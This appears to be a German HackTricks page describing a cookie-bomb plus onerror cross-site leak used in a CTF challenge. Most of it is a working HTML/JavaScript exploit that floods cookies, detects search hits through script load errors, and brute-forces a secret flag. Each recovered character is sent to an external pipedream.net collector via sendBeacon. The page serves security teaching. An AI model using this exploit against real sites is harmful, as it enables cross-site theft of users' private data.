Cookie Bomb + Onerror XS Leak

Unterstütze HackTricks

Das folgende Skript stammt von hier und nutzt eine Funktionalität aus, die es dem Benutzer ermöglicht, beliebig viele Cookies einzufügen, und lädt dann eine Datei als Skript, wobei bekannt ist, dass die echte Antwort größer sein wird als die falsche. Wenn dies erfolgreich ist, ist die Antwort eine Weiterleitung mit einer resultierenden URL, die länger ist, zu groß, um vom Server verarbeitet zu werden, sodass ein Fehler-HTTP-Statuscode zurückgegeben wird. Wenn die Suche fehlschlägt, passiert nichts, da die URL kurz ist.

<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script>
const $ = document.querySelector.bind(document);
const sleep = (ms) => new Promise(r => setTimeout(r, ms));
let i = 0;
const stuff = async (len=3500) => {
let name = Math.random();
$("form").target = name;
let w = window.open('', name);
$("#f").value = "_".repeat(len);
$("#f").name = i++;
$("form").submit();
await sleep(100);
};
const isError = async (url) => {
return new Promise(r => {
let script = document.createElement('script');
script.src = url;
script.onload = () => r(false);
script.onerror = () => r(true);
document.head.appendChild(script);
});
}
const search = (query) => {
return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
};
const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
const url = "//en4u1nbmyeahu.x.pipedream.net/";
let known = "actf{";
window.onload = async () => {
navigator.sendBeacon(url + "?load");
await Promise.all([stuff(), stuff(), stuff(), stuff()]);
await stuff(1600);
navigator.sendBeacon(url + "?go");
while (true) {
for (let c of alphabet) {
let query = known + c;
if (await search(query)) {
navigator.sendBeacon(url, query);
known += c;
break;
}
}
}
};
</script>
Unterstütze HackTricks

Last updated